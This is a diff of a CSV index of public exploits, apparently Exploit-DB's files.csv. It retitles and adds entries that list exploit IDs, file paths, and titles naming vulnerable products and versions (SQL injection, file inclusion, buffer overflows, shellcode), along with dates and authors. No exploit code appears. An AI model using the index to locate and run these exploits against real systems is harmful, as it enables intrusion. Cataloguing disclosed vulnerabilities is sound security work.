19092,platforms/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0
|
||||
19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0
|
||||
19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
|
||||
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
|
||||
|
@ -12357,7 +12361,7 @@ id,file,description,date,author,platform,type,port
|
|||
22084,platforms/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Length Account Compromise",2002-12-16,Andi,unix,remote,0
|
||||
22085,platforms/unix/remote/22085.txt,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Memory Corruption",2002-12-12,"Stefan Esser",unix,remote,0
|
||||
22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",linux,remote,0
|
||||
22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/Root SQL Injection",2012-10-19,xistence,multiple,remote,0
|
||||
22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection",2012-10-19,xistence,multiple,remote,0
|
||||
22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,windows,remote,0
|
||||
22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 - say() Format String",2002-12-16,"Marceta Milos",linux,remote,0
|
||||
22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x - Negative Length HTTP Header",2002-12-19,iDefense,linux,remote,0
|
||||
|
@ -12599,7 +12603,7 @@ id,file,description,date,author,platform,type,port
|
|||
23043,platforms/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 - '.SMIL' File Script Execution",2003-08-19,KrazySnake,windows,remote,0
|
||||
23044,platforms/windows/remote/23044.txt,"Microsoft Internet Explorer 5/6 - Object Type Validation",2003-08-20,"Drew Copley",windows,remote,0
|
||||
23049,platforms/linux/remote/23049.c,"Srcpd 2.0 - Multiple Buffer Overflow Vulnerabilities",2003-08-21,Over_G,linux,remote,0
|
||||
23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Root Compromise",2003-08-23,kf,linux,remote,0
|
||||
23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Code Execution",2003-08-23,kf,linux,remote,0
|
||||
23066,platforms/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 - Long Filename Buffer Overrun",2003-08-27,storm,windows,remote,0
|
||||
23068,platforms/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal",2003-08-30,sickle,windows,remote,0
|
||||
23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Information Disclosure",2003-08-30,"Martin Eiszner",multiple,remote,0
|
||||
|
@ -15122,6 +15126,9 @@ id,file,description,date,author,platform,type,port
|
|||
40857,platforms/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",windows,remote,0
|
||||
40858,platforms/hardware/remote/40858.py,"BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution",2016-12-04,"Jeremy Brown",hardware,remote,0
|
||||
40862,platforms/windows/remote/40862.py,"Alcatel Lucent Omnivista 8770 - Remote Code Execution",2016-12-04,malerisch,windows,remote,0
|
||||
40867,platforms/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote,0
|
||||
40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
|
||||
40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -16451,7 +16458,7 @@ id,file,description,date,author,platform,type,port
|
|||
2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0
|
||||
2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0
|
||||
2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0
|
||||
2259,platforms/php/webapps/2259.txt,"proManager 0.73 - (note.php) SQL Injection",2006-08-26,Kacper,php,webapps,0
|
||||
2259,platforms/php/webapps/2259.txt,"ProManager 0.73 - 'note.php' SQL Injection",2006-08-26,Kacper,php,webapps,0
|
||||
2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion",2006-08-27,Kacper,php,webapps,0
|
||||
2261,platforms/php/webapps/2261.php,"iziContents RC6 - GLOBALS[] Remote Code Execution",2006-08-27,Kacper,php,webapps,0
|
||||
2262,platforms/php/webapps/2262.php,"CMS Frogss 0.4 - (podpis) SQL Injection",2006-08-27,Kacper,php,webapps,0
|
||||
|
@ -16573,7 +16580,7 @@ id,file,description,date,author,platform,type,port
|
|||
2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0
|
||||
2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Parameter Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0
|
||||
2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0
|
||||
2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - (nbs) Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0
|
||||
2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0
|
||||
2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - (dix.php3) Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0
|
||||
2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion",2006-09-21,Solpot,php,webapps,0
|
||||
2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - (RR.php) Remote File Inclusion",2006-09-21,Kacper,php,webapps,0
|
||||
|
@ -16735,7 +16742,7 @@ id,file,description,date,author,platform,type,port
|
|||
2598,platforms/php/webapps/2598.php,"PH Pexplorer 0.24 - (explorer_load_lang.php) Local File Inclusion",2006-10-19,Kacper,php,webapps,0
|
||||
2599,platforms/php/webapps/2599.txt,"pandaBB - (displayCategory) Remote File Inclusion",2006-10-19,nukedclx,php,webapps,0
|
||||
2600,platforms/php/webapps/2600.txt,"Segue CMS 1.5.8 - (themesdir) Remote File Inclusion",2006-10-19,nuffsaid,php,webapps,0
|
||||
2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - (config.inc.php3) File Inclusion",2006-10-19,x_w0x,php,webapps,0
|
||||
2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - 'config.inc.php3' File Inclusion",2006-10-19,x_w0x,php,webapps,0
|
||||
2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - (admin_module.php) Remote File Inclusion",2006-10-20,MP,php,webapps,0
|
||||
2604,platforms/php/webapps/2604.txt,"WGCC 0.5.6b - (quiz.php) SQL Injection",2006-10-20,ajann,php,webapps,0
|
||||
2605,platforms/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0
|
||||
|
@ -17238,7 +17245,7 @@ id,file,description,date,author,platform,type,port
|
|||
3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - (result.php surv) Blind SQL Injection",2007-02-21,s0cratex,php,webapps,0
|
||||
3357,platforms/php/webapps/3357.txt,"DZCP (deV!L_z Clanportal) 1.4.5 - Remote File Disclosure",2007-02-21,Kiba,php,webapps,0
|
||||
3360,platforms/php/webapps/3360.txt,"FlashGameScript 1.5.4 - (index.php func) Remote File Inclusion",2007-02-22,JuMp-Er,php,webapps,0
|
||||
3361,platforms/php/webapps/3361.txt,"eFiction 3.1.1 - (path_to_smf) Remote File Inclusion",2007-02-22,"ThE dE@Th",php,webapps,0
|
||||
3361,platforms/php/webapps/3361.txt,"eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion",2007-02-22,"ThE dE@Th",php,webapps,0
|
||||
3365,platforms/php/webapps/3365.txt,"FCRing 1.31 - (fcring.php s_fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0
|
||||
3366,platforms/php/webapps/3366.txt,"Sinapis 2.2 Gastebuch - (sinagb.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0
|
||||
3367,platforms/php/webapps/3367.txt,"Sinapis Forum 2.2 - (sinapis.php fuss) Remote File Inclusion",2007-02-23,kezzap66345,php,webapps,0
|
||||
|
@ -17393,7 +17400,7 @@ id,file,description,date,author,platform,type,port
|
|||
3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - 'INCLUDE_PATH' Remote File Inclusion",2007-04-01,GoLd_M,php,webapps,0
|
||||
3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail 1.1 - (camid) SQL Injection",2007-04-01,ajann,php,webapps,0
|
||||
3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser 0.92 - (genre.php) Blind SQL Injection",2007-04-01,ajann,php,webapps,0
|
||||
3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - (news.php newsid) SQL Injection",2007-04-01,Dj7xpl,php,webapps,0
|
||||
3631,platforms/php/webapps/3631.txt,"FlexPHPNews 0.0.5 - 'newsid' Parameter SQL Injection",2007-04-01,Dj7xpl,php,webapps,0
|
||||
3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P 2.0 - 'cid' SQL Injection",2007-04-01,ajann,php,webapps,0
|
||||
3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection",2007-04-01,ajann,php,webapps,0
|
||||
3638,platforms/php/webapps/3638.txt,"MapLab MS4W 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0
|
||||
|
@ -17581,14 +17588,14 @@ id,file,description,date,author,platform,type,port
|
|||
3920,platforms/php/webapps/3920.txt,"Feindt Computerservice News 2.0 - (newsadmin.php action) Remote File Inclusion",2007-05-14,Mogatil,php,webapps,0
|
||||
3923,platforms/php/webapps/3923.txt,"linksnet newsfeed 1.0 - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0
|
||||
3924,platforms/php/webapps/3924.txt,"Media Gallery for Geeklog 1.4.8a - Remote File Inclusion",2007-05-14,"ThE TiGeR",php,webapps,0
|
||||
3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - (atk.inc config_atkroot) Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0
|
||||
3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 - 'config_atkroot' Parameter Remote File Inclusion",2007-05-15,Katatafish,php,webapps,0
|
||||
3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager 1.21 - Blind SQL Injection",2007-05-15,ajann,php,webapps,0
|
||||
3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - 'sid' SQL Injection",2007-05-15,ajann,php,webapps,0
|
||||
3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,php,webapps,0
|
||||
3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - custom_vars.php Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0
|
||||
3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0
|
||||
3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0
|
||||
3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - (print.php newnr) SQL Injection",2007-05-16,Silentz,php,webapps,0
|
||||
3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' Parameter SQL Injection",2007-05-16,Silentz,php,webapps,0
|
||||
3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0
|
||||
3944,platforms/php/webapps/3944.txt,"Mambo Component com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0
|
||||
3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0
|
||||
|
@ -17771,7 +17778,7 @@ id,file,description,date,author,platform,type,port
|
|||
4264,platforms/cgi/webapps/4264.txt,"Cartweaver - 'Details.cfm ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0
|
||||
4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0
|
||||
4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0
|
||||
4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - (format_menue) Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0
|
||||
4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0
|
||||
4269,platforms/php/webapps/4269.txt,"FrontAccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0
|
||||
4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0
|
||||
4273,platforms/php/webapps/4273.txt,"Ncaster 1.7.2 - (archive.php) Remote File Inclusion",2007-08-09,k1n9k0ng,php,webapps,0
|
||||
|
@ -17994,7 +18001,7 @@ id,file,description,date,author,platform,type,port
|
|||
4627,platforms/php/webapps/4627.txt,"ProfileCMS 1.0 - 'id' SQL Injection",2007-11-16,K-159,php,webapps,0
|
||||
4628,platforms/php/webapps/4628.txt,"Myspace Clone Script - 'index.php' Remote File Inclusion",2007-11-16,VerY-SecReT,php,webapps,0
|
||||
4629,platforms/php/webapps/4629.txt,"net-finity - 'links.php' SQL Injection",2007-11-16,VerY-SecReT,php,webapps,0
|
||||
4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - (index.php action) Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0
|
||||
4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - 'action' Parameter Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0
|
||||
4631,platforms/php/webapps/4631.txt,"phpBBViet 02.03.2007 - 'phpbb_root_path' Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0
|
||||
4632,platforms/php/webapps/4632.txt,"Vigile CMS 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0
|
||||
4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script - SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0
|
||||
|
@ -18335,7 +18342,7 @@ id,file,description,date,author,platform,type,port
|
|||
5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - 'last_module' Parameter Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0
|
||||
5099,platforms/php/webapps/5099.php,"Mix Systems CMS - 'parent/id' Parameters SQL Injection",2008-02-10,halkfild,php,webapps,0
|
||||
5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - 'cat' Parameter SQL Injection",2008-02-12,NTOS-Team,php,webapps,0
|
||||
5103,platforms/php/webapps/5103.txt,"Joomla! Component rapidrecipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0
|
||||
5103,platforms/php/webapps/5103.txt,"Joomla! Component Rapid Recipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0
|
||||
5104,platforms/php/webapps/5104.txt,"Joomla! Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0
|
||||
5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - 'albums' Pramater SQL Injection",2008-02-12,DNX,php,webapps,0
|
||||
5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0
|
||||
|
@ -18810,61 +18817,61 @@ id,file,description,date,author,platform,type,port
|
|||
5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0
|
||||
5714,platforms/php/webapps/5714.pl,"Joomla! Component MyContent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
|
||||
5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0
|
||||
5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0
|
||||
5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting",2008-06-01,"CWH Underground",php,webapps,0
|
||||
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0
|
||||
5719,platforms/php/webapps/5719.pl,"Joomla! Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
|
||||
5721,platforms/php/webapps/5721.pl,"Joomla! Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps,0
|
||||
5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion",2008-06-02,HaiHui,php,webapps,0
|
||||
5723,platforms/php/webapps/5723.txt,"Joomla! Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,php,webapps,0
|
||||
5724,platforms/php/webapps/5724.txt,"pLog - 'albumID' SQL Injection",2008-06-02,DreamTurk,php,webapps,0
|
||||
5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-02,"CWH Underground",php,webapps,0
|
||||
5724,platforms/php/webapps/5724.txt,"PLog 1.0.6 - 'albumID' Parameter SQL Injection",2008-06-02,DreamTurk,php,webapps,0
|
||||
5725,platforms/php/webapps/5725.txt,"smeweb 1.4b - SQL Injection / Cross-Site Scripting",2008-06-02,"CWH Underground",php,webapps,0
|
||||
5728,platforms/php/webapps/5728.txt,"FlashBlog 0.31b - Arbitrary File Upload",2008-06-03,"ilker Kandemir",php,webapps,0
|
||||
5729,platforms/php/webapps/5729.txt,"Joomla! Component joomradio 1.0 - 'id' SQL Injection",2008-06-03,His0k4,php,webapps,0
|
||||
5729,platforms/php/webapps/5729.txt,"Joomla! Component JoomRadio 1.0 - 'id' Parameter SQL Injection",2008-06-03,His0k4,php,webapps,0
|
||||
5730,platforms/php/webapps/5730.txt,"Joomla! Component iDoBlog b24 - SQL Injection",2008-06-03,His0k4,php,webapps,0
|
||||
5731,platforms/php/webapps/5731.txt,"Battle Blog 1.25 - (comment.asp) SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0
|
||||
5731,platforms/php/webapps/5731.txt,"Battle Blog 1.25 - 'comment.asp' SQL Injection",2008-06-03,Bl@ckbe@rD,php,webapps,0
|
||||
5733,platforms/php/webapps/5733.txt,"QuickerSite 1.8.5 - Multiple Vulnerabilities",2008-06-03,BugReport.IR,php,webapps,0
|
||||
5734,platforms/php/webapps/5734.pl,"Joomla! Component JooBlog 0.1.1 - Blind SQL Injection",2008-06-03,His0k4,php,webapps,0
|
||||
5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script - Code Execution",2008-06-03,JIKO,php,webapps,0
|
||||
5736,platforms/php/webapps/5736.txt,"1Book Guestbook Script 1.0.1 - Code Execution",2008-06-03,JIKO,php,webapps,0
|
||||
5737,platforms/php/webapps/5737.pl,"Joomla! Component Jotloader 1.2.1.a - Blind SQL Injection",2008-06-04,His0k4,php,webapps,0
|
||||
5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0
|
||||
5740,platforms/php/webapps/5740.pl,"Joomla! Component EasyBook 1.1 - (gbid) SQL Injection",2008-06-04,ZAMUT,php,webapps,0
|
||||
5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-05,"CWH Underground",php,webapps,0
|
||||
5739,platforms/php/webapps/5739.txt,"PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting",2008-06-04,"CWH Underground",php,webapps,0
|
||||
5740,platforms/php/webapps/5740.pl,"Joomla! Component EasyBook 1.1 - 'gbid' Parameter SQL Injection",2008-06-04,ZAMUT,php,webapps,0
|
||||
5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 - SQL Injection / Cross-Site Scripting",2008-06-05,"CWH Underground",php,webapps,0
|
||||
5743,platforms/php/webapps/5743.txt,"Joomla! Component SimpleShop 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0
|
||||
5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - (css_str) SQL Injection",2008-06-05,MustLive,php,webapps,0
|
||||
5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - (shownews) SQL Injection",2008-06-05,anonymous,php,webapps,0
|
||||
5748,platforms/php/webapps/5748.txt,"Joomla! Component JoomlaDate - (user) SQL Injection",2008-06-05,His0k4,php,webapps,0
|
||||
5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 - 'css_str' Parameter SQL Injection",2008-06-05,MustLive,php,webapps,0
|
||||
5745,platforms/php/webapps/5745.txt,"pSys 0.7.0.a - 'shownews' Parameter SQL Injection",2008-06-05,anonymous,php,webapps,0
|
||||
5748,platforms/php/webapps/5748.txt,"Joomla! Component JoomlaDate 1.2 - 'user' Parameter SQL Injection",2008-06-05,His0k4,php,webapps,0
|
||||
5752,platforms/php/webapps/5752.pl,"Joomla! Component GameQ 4.0 - SQL Injection",2008-06-07,His0k4,php,webapps,0
|
||||
5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection",2008-06-08,Zigma,asp,webapps,0
|
||||
5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0
|
||||
5755,platforms/php/webapps/5755.pl,"Joomla! Component yvcomment 1.16 - Blind SQL Injection",2008-06-08,His0k4,php,webapps,0
|
||||
5753,platforms/asp/webapps/5753.txt,"JiRo's FAQ Manager eXperience 1.0 - 'fID' Parameter SQL Injection",2008-06-08,Zigma,asp,webapps,0
|
||||
5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - Local File Inclusion / Cross-Site Scripting",2008-06-08,"CWH Underground",php,webapps,0
|
||||
5755,platforms/php/webapps/5755.pl,"Joomla! Component yvComment 1.16 - Blind SQL Injection",2008-06-08,His0k4,php,webapps,0
|
||||
5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - 'Filename' File Disclosure",2008-06-08,MEEKAAH,php,webapps,0
|
||||
5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 - (clients.php) Remote File Inclusion",2008-06-08,ahmadbady,php,webapps,0
|
||||
5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion",2008-06-08,ahmadbady,php,webapps,0
|
||||
5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - Cross-Site Scripting / Local File Inclusion",2008-06-08,StAkeR,php,webapps,0
|
||||
5759,platforms/php/webapps/5759.txt,"Joomla! Component rapidrecipe - SQL Injection",2008-06-08,His0k4,php,webapps,0
|
||||
5759,platforms/php/webapps/5759.txt,"Joomla! Component Rapid Recipe 1.6.6/1.6.7 - SQL Injection",2008-06-08,His0k4,php,webapps,0
|
||||
5760,platforms/php/webapps/5760.pl,"Galatolo Web Manager 1.0 - SQL Injection",2008-06-09,Stack,php,webapps,0
|
||||
5761,platforms/php/webapps/5761.pl,"Joomla! Component iJoomla! News Portal - 'itemID' SQL Injection",2008-06-09,"ilker Kandemir",php,webapps,0
|
||||
5761,platforms/php/webapps/5761.pl,"Joomla! Component iJoomla News Portal 1.0 - 'itemID' Parameter SQL Injection",2008-06-09,"ilker Kandemir",php,webapps,0
|
||||
5762,platforms/php/webapps/5762.txt,"ProManager 0.73 - 'config.php' Local File Inclusion",2008-06-09,Stack,php,webapps,0
|
||||
5763,platforms/asp/webapps/5763.txt,"real estate Web site 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-09,JosS,asp,webapps,0
|
||||
5764,platforms/php/webapps/5764.txt,"telephone directory 2008 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-09,"CWH Underground",php,webapps,0
|
||||
5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - (article) SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0
|
||||
5763,platforms/asp/webapps/5763.txt,"real estate Web site 1.0 - SQL Injection / Cross-Site Scripting",2008-06-09,JosS,asp,webapps,0
|
||||
5764,platforms/php/webapps/5764.txt,"Telephone Directory 2008 - SQL Injection / Cross-Site Scripting",2008-06-09,"CWH Underground",php,webapps,0
|
||||
5765,platforms/asp/webapps/5765.txt,"ASPilot Pilot Cart 7.3 - 'article' Parameter SQL Injection",2008-06-09,Bl@ckbe@rD,asp,webapps,0
|
||||
5766,platforms/php/webapps/5766.txt,"realm CMS 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0
|
||||
5767,platforms/php/webapps/5767.php,"Flux CMS 1.5.0 - (loadsave.php) Arbitrary File Overwrite",2008-06-09,EgiX,php,webapps,0
|
||||
5768,platforms/php/webapps/5768.txt,"pNews 2.08 - (shownews) SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0
|
||||
5767,platforms/php/webapps/5767.php,"Flux CMS 1.5.0 - 'loadsave.php' Arbitrary File Overwrite",2008-06-09,EgiX,php,webapps,0
|
||||
5768,platforms/php/webapps/5768.txt,"pNews 2.08 - 'shownews' Parameter SQL Injection",2008-06-09,Cr@zy_King,php,webapps,0
|
||||
5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0
|
||||
5770,platforms/php/webapps/5770.php,"Achievo 1.3.2 - 'FCKeditor' Arbitrary File Upload",2008-06-09,EgiX,php,webapps,0
|
||||
5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b - (css) Local File Inclusion",2008-06-10,Unohope,php,webapps,0
|
||||
5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - (comments) SQL Injection",2008-06-10,Unohope,php,webapps,0
|
||||
5773,platforms/php/webapps/5773.txt,"yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-06-10,Unohope,php,webapps,0
|
||||
5774,platforms/php/webapps/5774.txt,"Insanely Simple Blog 0.5 - (index) SQL Injection",2008-06-10,Unohope,php,webapps,0
|
||||
5775,platforms/php/webapps/5775.txt,"ASPPortal Free Version - 'Topic_Id' SQL Injection",2008-06-10,JosS,php,webapps,0
|
||||
5776,platforms/php/webapps/5776.txt,"Experts 1.0.0 - (answer.php) SQL Injection",2008-06-10,"CWH Underground",php,webapps,0
|
||||
5779,platforms/php/webapps/5779.txt,"SyndeoCMS 2.6.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0
|
||||
5771,platforms/php/webapps/5771.txt,"ErfurtWiki R1.02b - Local File Inclusion",2008-06-10,Unohope,php,webapps,0
|
||||
5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 - SQL Injection",2008-06-10,Unohope,php,webapps,0
|
||||
5773,platforms/php/webapps/5773.txt,"Yblog 0.2.2.2 - Cross-Site Scripting / SQL Injection",2008-06-10,Unohope,php,webapps,0
|
||||
